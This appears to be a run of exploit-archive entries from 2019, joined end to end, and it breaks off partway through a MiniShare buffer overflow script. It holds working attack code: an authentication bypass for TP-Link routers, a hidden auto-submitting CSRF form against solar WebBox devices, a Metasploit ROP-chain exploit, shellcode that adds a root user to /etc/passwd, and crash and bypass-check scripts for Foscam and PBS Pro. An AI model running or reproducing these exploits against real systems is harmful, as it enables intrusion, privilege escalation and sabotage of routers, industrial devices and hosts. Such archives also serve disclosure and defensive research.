# Exploit Title: Foscam Video Management System 1.1.6.6 - 'UID' Denial of Service (PoC)
# Author: Alessandro Magnosi
# Date: 2019-10-09
# Vendor Homepage: https://www.foscam.com/
# Software Link : https://www.foscam.com/downloads/appsoftware.html?id=5
# Tested Version: 1.1.6.6
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 SP1 x86 en, Windows 10 Pro x64 it

# Steps to Produce the Crash: 
# 1.- Run python code : python foscam-vms-uid-dos.py
# 2.- Open FoscamVMS1.1.6.txt and copy its content to clipboard
# 3.- Open FoscamVMS
# 4.- Go to Add Device
# 5.- Choose device type "NVR"
# 6.- Copy the content of the file into UID
# 7.- Click on Login Check
# 8.- Crashed

#!/usr/bin/python

buffer = "A" * 5000
f = open ("FoscamVMS1.1.6.txt", "w")
f.write(buffer)
f.close()

===========================================================
PBS Professional MoM Authentication Bypass (CVE-2019-15719)
===========================================================

* Software: PBS Professional
* Affected Versions: All versions up to and including 19.2.3
* Vendor: Altair Engineering, Inc
* CVE Reference: CVE-2019-15719
* Severity: CVSS 9.0 [CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H]
* Author: John Fitzpatrick
* Date: 2019-10-08


Description
===========

HPCsec have identified a vulnerability in PBS Pro which allows for arbitrary code execution on any node running the pbs_mom service. This vulnerability can be exploited by anyone in a position to communicate with the pbs_mom service from an authorized node within the cluster. Exploitation of this issue allows for arbitrary code execution as any other user including as root, even in installations where root is not permitted to submit jobs.

This issue arises as a result of the pbs_mom service failing to apply a necessary security check before handling instructions sent to it.

By default the pbs_mom service runs on TCP port 15002. The following code can be run to check whether a mom is vulnerable to this issue:

---BEGIN CODE::python---

import socket
import sys

if len(sys.argv) < 2:
    print "ERROR: Please specify the address of pbs_mom"
    sys.exit(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((sys.argv[1], 15002))
    s.send("+2+1+1+1x+1x+1x2+222+15+1x+0+1x+02+24+1x+01+1x+02+12+1x+0+1x+02+14+1x+0+1x+02+"+
"131+1x+0+1x+02+411+1x+01+1x+02+241+1x+01+1x+02+261+1x+01+1x+02+12+1x+0+1x+02+1"+
"31+1x+0+1x+02+421+1x+01+1x+02+221+1x+1+1x+112+102+251+1x+1+1x+1x2+102+221+1x+0"+
"+1x2+103+3351+1x+01+1x+02+13+1x+0+1x+02+14+1x+0+1x2+102+19+1x+0+1x+02+12+1x+0+"+
"11+02+181+1x+0+210+02+29+6hpcsec+01+1x+02+141+1x+0+11+0+0")
    response = s.recv(64)

    if "Invalid" in response:
        print "Vulnerable = NO"
    elif "Access" in response:
        print "Vulnerable = UNKNOWN (try again from a permitted host, e.g. another mom or the pbs server)"
    elif "Undefined" or "System" in response:
        print "Vulnerable = YES"
    else:
        print "Vulnerable = UNKNOWN (unhandled response)"
except Exception, e:
    print "ERROR: "+str(e)

# Download here: https://files.hpcsec.com/utilities/check-CVE-2019-15719.py

---END CODE---


Solution
========

A fix for this issue has been incorporated into all currently supported versions of PBS Professional. Fixes are available in the following versions:

* 13.0.412
* 14.2.7
* 18.2.5
* 19.2.4 and newer

A fix is now available on GitHub for users of the open source 19.1.X branch. The fix is incorporated into the current 19.1.2 release with no change to the version number. Therefore earlier instances of 19.1.2 are vulnerable.

Those running earlier versions should update to the latest fixed version in the relevant branch.

The updated versions are available from the Altair PBS Professional download site (https://www.pbspro.org/Download.aspx#download).


Timeline
========

2019-08-22: Issue reported to Altair
2019-10-07: Patch available for all supported versions of PBS Pro
2019-10-08: HPCsec advisory published

================================================
https://www.hpcsec.com/2019/10/08/cve-2019-15719
================================================

# Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass
# Date: 2019-06-20
# Exploit Author: Uriel Kosayev
# Vendor Homepage: https://www.tp-link.com
# Version: TL-WR1043ND V2
# Tested on: TL-WR1043ND V2
# CVE : CVE-2019-6971
# CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-6971

import requests

ascii = '''
  __________        __    _       __  
 /_  __/ __ \      / /   (_)___  / /__
  / / / /_/ /_____/ /   / / __ \/ //_/
 / / / ____/_____/ /___/ / / / / ,<   
/_/ /_/         /_____/_/_/ /_/_/|_|  

'''
print(ascii)
Default_Gateway = raw_input("Enter your TP-Link router IP: ")

# Constants
url = 'http://'
url2 = '/userRpm/LoginRpm.htm?Save=Save'
full = url + Default_Gateway + url2
# full = str(full)

# The full GET request with the cookie authorization hijacked
req_header = {
'Host': '{}'.format(Default_Gateway),
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://{}/userRpm/LoginRpm.htm?Save=Save'.format(Default_Gateway),
'Connection': 'close',
'Cookie': '''Authorization=Basic%20QWRtaW5pc3RyYXRvcjpjM2JiNTI5NjdiNjVjYWY4ZWRkMWNiYjg4ZDcwYzYxMQ%3D%3D''',
'Upgrade-Insecure-Requests': '1'
}

try:
    response = requests.get(full, headers=req_header).content
except requests.exceptions.ConnectionError:
    print("Enter a valid Default Gateway IP address\nExiting...")
    exit()
generate = response.split('/')[3] # Gets the randomized URL "session ID"


option_1 = input("Press 1 to check if your TP-Link router is vulnerable: ")

if option_1 is 1:

    if generate in response:
        print('Vulnerable!\n')
        option_2 = input('Press 2 if you want to change the router\'s SSID or any other key to quit: ')
        if option_2 is 2:
            newssid = raw_input('New name: ')
            ssid_url = '/userRpm/WlanNetworkRpm.htm?ssid1={}&ssid2=TP-LINK_660A_2&ssid3=TP-LINK_660A_3&ssid4=TP-LINK_660A_4&region=43&band=0&mode=5&chanWidth=2&channel=1&rate=83&speedboost=2&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save'.format(
                newssid)
            changessid_full = url + Default_Gateway + '/' + generate + ssid_url
            requests.get(changessid_full, headers=req_header)
            print('Changed to: {}'.format(newssid))
        else:
            ("Please choose the correct option.\nExiting...")
            exit()
    else:
        print('Not Vulnerable')
        exit()
else:
    print("Please choose the correct option.\nExiting...")
    exit()

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
'Name'           => "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",
'Description'    => %q{
       This module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7.
       By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the
       application, a buffer is overwritten, which allows for running shellcode.
   Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
              Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Maxim Guslyaev', # EDB POC, Metasploit Module
        ],
'References'     =>
        [
          [ 'CVE', '2017-15221' ],
          [ 'EDB', '47468' ]
        ],
'Platform'       => 'win',
'Targets'        =>
        [
          [
'Windows 7 Enterprise/10 Pro',
            {
'Ret' => 0x1002D038 # RET
            }
          ]
        ],
'Payload'        =>
        {
'BadChars' => "\x00\x09\x0a"
        },
'Privileged'     => false,
'DisclosureDate' => "Oct 06 2019",
'DefaultTarget'  => 0))

    register_options(
    [
      OptString.new('FILENAME', [true, 'The malicious file name', 'music.asx'])
    ])
  end

  def exploit

buf = "http://"
buf += "A" * 17417 + [target.ret].pack("V") + "CCCC"

## Save allocation type (0x1000) in EDX
buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
buf += [0x11111111].pack("V")
buf += [0x10029B8C].pack("V") # XOR EDX,EDX # RETN
buf += [0x1002D493].pack("V") # POP EDX # RETN
buf += [0xEEEEFEEF].pack("V")
buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
buf += [0x41414141].pack("V")

## Save the address of VirtualAlloc() in ESI
buf += [0x1002fade].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll] 
buf += [0x1004f060].pack("V") # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
buf += [0x1003239f].pack("V") # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
buf += [0x10040754].pack("V") # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
buf += [0x41414141].pack("V")
buf += [0x41414141].pack("V")

## Save the size of the block in EBX
buf += [0x1004d881].pack("V") # XOR EAX,EAX # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x10034735].pack("V") # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN

## Save the address of (# ADD ESP,8 # RETN) in EBP
buf += [0x10031c6c].pack("V") # POP EBP # RETN
buf += [0x10012316].pack("V") # ADD ESP,8 # RETN
#buf += [0x1003df73].pack("V") # & PUSH ESP # RETN

## Save memory protection code (0x40) in ECX
buf += [0x1002ca22].pack("V") # POP ECX # RETN
buf += [0xFFFFFFFF].pack("V")
buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN

## Save ROP-NOP in EDI
buf += [0x1002e346].pack("V") # POP EDI # RETN
buf += [0x1002D038].pack("V") # RETN

## Save NOPs in EAX
#buf += [0x1003bca4].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll] 
#buf += [0x90909090].pack("V") # nop

## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
buf += [0x1002E516].pack("V") # POP EAX # RETN
buf += [0xA4E2F275].pack("V")
buf += [0x1003efe2].pack("V") # ADD EAX,5B5D5E5F # RETN
buf += [0x10040ce5].pack("V") # PUSH EAX # RETN

buf += "\x90" * 4
buf += [0x1003df73].pack("V") # & PUSH ESP # RETN
buf += "\x90" * 20
buf += payload.encoded

    file_create(buf)

  end
end

# Exploit Title: SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery
# Date: 2019-10-08
# Exploit Author: Borja Merino and Eduardo Villaverde
# Vendor Homepage: https://www.sma.de
# Version: Firmware Version 1.6 and prior
# Tested on: Sunny WebBox SMA Solar Device (Firmware Version 1.6)
# CVE : CVE-2019-13529
# ICS-Cert Advisory: https://www.us-cert.gov/ics/advisories/icsa-19-281-01

<!-- Change any hidden value -->

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://X.X.X.X/wb_network_changed.htm' target="csrf-frame" id="csrf-form">
<input type='hidden' name='RadioButtonDhcp' value='off'>
<input type='hidden' name='IpAddr' value='1.1.1.1'>
<input type='hidden' name='SubnetMask' value='255.255.255.0'>
<input type='hidden' name='Gateway' value='1.1.1.1'> 
<input type='hidden' name='DnsIpAddr' value='5.5.5.1'>
<input type='hidden' name='Dns2IpAddr' value='5.5.5.2'>
<input type='hidden' name='StaticNatPortHttp' value='80'>
<input type='hidden' name='WebserverPort' value='80'>
<input type='hidden' name='WebservicePort' value='80'>
<input type='hidden' name='RadioButtonModbus' value='off'>
<input type='hidden' name='ModbusPort' value='502'>
<input type='hidden' name='BConfirm' value='Confirmar'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>

# Exploit Title: Linux/x86 -  Add User to /etc/passwd Shellcode (59 bytes)
# Date: 2019-10-05
# Exploit Author: sagar.offsec (VL43CK)
# Guided by: Touhid M.Shaikh
# Designation: Security Consultant at SecureLayer7
# Website: https://www.sagaroffsec.com
# Tested on: Ubuntu i386 GNU/LINUX
# Shellcode Length: 59

----------------------(DESCRIPTION)----------------------------

This shellcode will first change /etc/passwd permission to 777 and then
add a user "vl43ck" in it with password "test" with root permissions.

----------------------(SHELLCODE DUMP)-------------------------
global _start

section .text
_start:

;chmod 777 /etc/passwd

xor eax, eax
push eax

push 0x64777373
push 0x61702f63
push 0x74652f2f
xor ebx, ebp
lea ebx, [esp]

xor ecx, ecx
mov cx, 0x1ff

mov al, 0xf
int 0x80

;add user in /etc/passwd

;open /etc/passwd

xor eax, eax
mov al, 5
xor ecx, ecx
mov cx, 2001Q
int 0x80

;write into /etc/passwd

xor ebx, ebx
mov ebx, eax

jmp short call_write
write:
pop ecx

xor eax, eax
xor edx, edx
mov dx, 132
mov al, 4
int 0x80

; close /etc/passwd

xor eax, eax
mov al, 6
int 0x80

;exit gracefully

push eax
xor eax, eax
mov al, 1
xor ebx, ebx
pop ebx
int 0x80

call_write:

call write
shellcode: db "vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash"


----------------------(COMPILE)-------------------------

gcc -m32 -fno-stack-protector -z execstack -o shellcode shellcode.c

----------------------(C-Code)--------------------------

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x31\xeb\x8d\x1c\x24\x31\xc9\x66\xb9\xff\x01\xb0\x0f\xcd\x80\x31\xc0\xb0\x05\x31\xc9\x66\xb9\x01\x04\xcd\x80\x31\xdb\x89\xc3\xeb\x1d\x59\x31\xc0\x31\xd2\x66\xba\x84\x00\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x50\x31\xc0\xb0\x01\x31\xdb\x5b\xcd\x80\xe8\xde\xff\xff\xff\x76\x6c\x34\x33\x63\x6b\x3a\x24\x36\x24\x62\x78\x77\x4a\x66\x7a\x6f\x72\x24\x4d\x55\x68\x55\x57\x4f\x30\x4d\x55\x67\x64\x6b\x57\x66\x50\x50\x45\x79\x64\x71\x67\x5a\x70\x6d\x2e\x59\x74\x50\x4d\x49\x2f\x67\x61\x4d\x34\x6c\x56\x71\x68\x50\x32\x31\x4c\x46\x4e\x57\x6d\x53\x4a\x38\x32\x31\x6b\x76\x4a\x6e\x49\x79\x6f\x4f\x44\x59\x74\x42\x68\x2e\x53\x46\x39\x61\x52\x37\x63\x69\x51\x42\x52\x43\x63\x77\x35\x62\x67\x6a\x58\x30\x3a\x30\x3a\x30\x3a\x76\x6c\x34\x33\x63\x6b\x3a\x2f\x74\x6d\x70\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";

main()
{

printf("Shellcode Length:  %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

#!/usr/bin/env python
import socket
import struct
import os

# Exploit Title: MiniShare 1.4.1 'CONNECT' remote buffer overflow
# Date: 10/11/2019
# Exploit Author: Striker
# Vendor Homepage: https://sourceforge.net/projects/minishare/files/OldFiles/minishare-1.4.1.exe/download
# Version: 1.4.1
# Tested on: Windows XP Sp3
# MiniShare

host = "10.0.2.15"
port = 80

#pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"

#bad characters = "\x00\x0d"
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21"
"\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41"
"\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61"
